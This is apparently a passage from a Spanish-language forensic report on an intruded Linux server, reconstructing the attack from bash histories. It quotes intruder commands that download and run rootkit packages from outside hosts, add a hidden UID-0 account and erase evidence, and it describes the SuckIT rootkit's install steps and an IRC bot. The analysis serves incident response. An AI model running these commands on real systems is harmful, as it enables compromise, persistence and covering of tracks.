INFORME TÉCNICO – ANÁLISIS FORENSE

More documents

Recommendations

Info

ello. También cabe la posibilidad de que le interesara dejar el virusinstalado por si el administrador detectaba las puertas traserasinstaladas. Ambas situaciones son viables.También me parece curioso el fichero que hay entre webalizer.hist yweed, si te fijas no tiene nombre (en realidad es un espacio en blanco).La verdad es que el listado ha sido muy productivo porque vemos quehay ficheros que hacen referencia a psybnc (un bouncer) a pscan (portscanner), etc...En el listado vemos que nos ha dejado historiales de bash, sonfichero que almacenan todos los comandos ejecutados por cada usuario. Elsiguiente en nuestra línea de tiempo (29-01-2005 15:22:20) sería elhistorial del usuario root veamos el contenido:$ sudo cat root/.bash_historylsdirps xcwget xhack.150m.com/sc.tgztar -zxvf sc.tgzcd sc./inst./skwwget xhack.150m.com/httpsperl httpscd ..rmrm -rf sc*Conecto a xhack.150.com y descargó(seguramente) un rootkit y loinstaló. Hagamos nosotros lo mismo (excepto instalarlo), lo descargamos ymiramos exactamente qué hay. Nos salen tres ficheros: inst, login y sk.Mirando con less vemos que el primero es un script:1.- Crea el directorio/usr/share/.X12-kernel y se desplaza allí.2.- Crea un fichero llamado .sniffer3.- Genera el fichero sk (mediante un echo con el código binariocomprimido y lo descomprime)4.- Luego crea una copia del fichero /sbin/init llamándola /sbin/initsk125.- Copia sk encima /sbin/initLos otros dos ficheros son binarios, sacaremos mas información deellos con file:$ file loginlogin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),for GNU/Linux 2.2.5, dynamically linked (uses shared libs), stripped$ file sksk: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),statically linked, strippedAl ejecutar el comando strings con el fichero login he identificado
el rootkit: SuckIT. Es capaz de ocultar PID's , ficheros, conexiones(tcp, udp y raw), también integra un shell TTY para acceso remoto(ficherologin). Otros ficheros relacionados con SuckIT son /etc/ld.so.hash y /etc/ld.so.cache (donde se guardan opciones definidas en la instalación,están encriptadas).Acto seguido lo que hace es descargar el fichero https que es unscript en perl que se encarga de conectar al un servidor de IRC, en estecaso a eu.undernet.org(puerto 6667) , al canal aseasi. Dejando la máquinaconectada esperando instrucciones, dejándola lo que se considera zombie.Después el intruso borró las evidencias.Todo esto lo debió hacer conectando por SSH porque la hora demodificación del fichero /root/.bash_history es 15:22:20 y la del .ssh esdos segundos más tarde (15:22:22).El siguiente historial se encuentra en el directorio raíz, algopoco frecuente. Puede ser que accediera desde la puerta trasera instaladay no se diera cuenta de que había creado un fichero de registro allí.Miremos el contenido de este fichero:$ sudo less .bash_historyid/usr/sbin/adduser -g 0 -u 0 -o weedpasswd weed/sbin/ifconfig | grep "inet"ls -sadir/usr/sbin/userdel weedls -sadirrm -rf za*rm -rf own/usr/sbin/adduser -g 0 -u 0 -o weedpasswd weedwget www.zetu.as.ro/crk.tar.gztar xzvf crk.tar.gzcd crk./install eliteaza 1idsucd crkdir./install eliteaz 9933SSH -l weed localhostls -sadirpasswd weedSSH -l weed localhosteliteazazeluserdel weed/usr/sbin/userdel weedls =-sadirrm -rf owncd scdircd ..
Page 1 and 2: INFORME TÉCNICO-ANÁLISIS FORENSEH
Page 3 and 4: INTRODUCCIÓNA lo largo de este inf
Page 8: m -rf sc*cd /var/logdirmkdir daemon
Page 11 and 12: PROFUNDIZANDO EN EL QUÉ HIZOCon el
Page 13 and 14: El intruso dejó en este caso mucha
Page 15 and 16: APENDICE IListado de ficheros modif
Page 17 and 18: -rwxr-xr-x 1 505 505 46379 2005-01-
Page 19 and 20: Checking `passwd'... not infectedCh

INFORME TÉCNICO – ANÁLISIS FORENSE

Create successful ePaper yourself

Delete template?

Save as template?